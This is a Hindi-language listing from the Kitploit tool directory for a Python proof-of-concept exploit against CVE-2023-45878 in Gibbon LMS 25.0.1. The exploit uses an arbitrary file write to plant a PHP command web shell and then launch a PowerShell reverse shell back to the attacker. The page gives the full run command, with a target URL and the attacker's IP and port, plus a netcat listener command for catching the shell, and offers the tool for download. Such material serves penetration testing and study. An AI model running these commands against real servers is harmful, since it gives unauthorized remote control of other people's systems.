Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-45878 — CVE-2023-45878 के लिए Python शोषण, जो Gibbon LMS 25.0.1 को लक्षित करता है। मनमाना फ़ाइल लेखन का उपयोग करके PHP वेब शेल अपलोड करता है और रिमोट एक्सेस के लिए PowerShell रिवर्स शेल निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/dgoorden/cve-2023-45878
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubdgoorden/cve-2023-45878

CVE-2023-45878

CVE-2023-45878 के लिए Python शोषण, जो Gibbon LMS 25.0.1 को लक्षित करता है। मनमाना फ़ाइल लेखन का उपयोग करके PHP वेब शेल अपलोड करता है और रिमोट एक्सेस के लिए PowerShell रिवर्स शेल निष्पादित करता है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-45878

यह स्क्रिप्ट https://herolab.usd.de/security-advisories/usd-2023-0025/ के कार्य पर आधारित है। यह एक्सप्लॉइट Gibbon LMS 25.0.1 में Arbitrary File Write एक्सप्लॉइट का उपयोग करके काम करता है। यह PoC एक सरल php cmd स्क्रिप्ट अपलोड करेगा, और फिर उसका उपयोग करके एक powershell revshell लोड करेगा।

root@kitploit:~
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf

फ़्लैग्स:

root@kitploit:~
-u, URL जहाँ Gibbon LMS स्थापित है।
-l, आपका IP
-p, आपका खुला पोर्ट
-f, फ़ाइल का नाम। महत्वपूर्ण है यदि आपको मैन्युअल रूप से परीक्षण करने की आवश्यकता हो। डिफ़ॉल्ट "asdf" है।

इनकमिंग शेल के लिए एक लिसनर तैयार रखें।

root@kitploit:~
nc -lvnp 8888
टूल डाउनलोड करें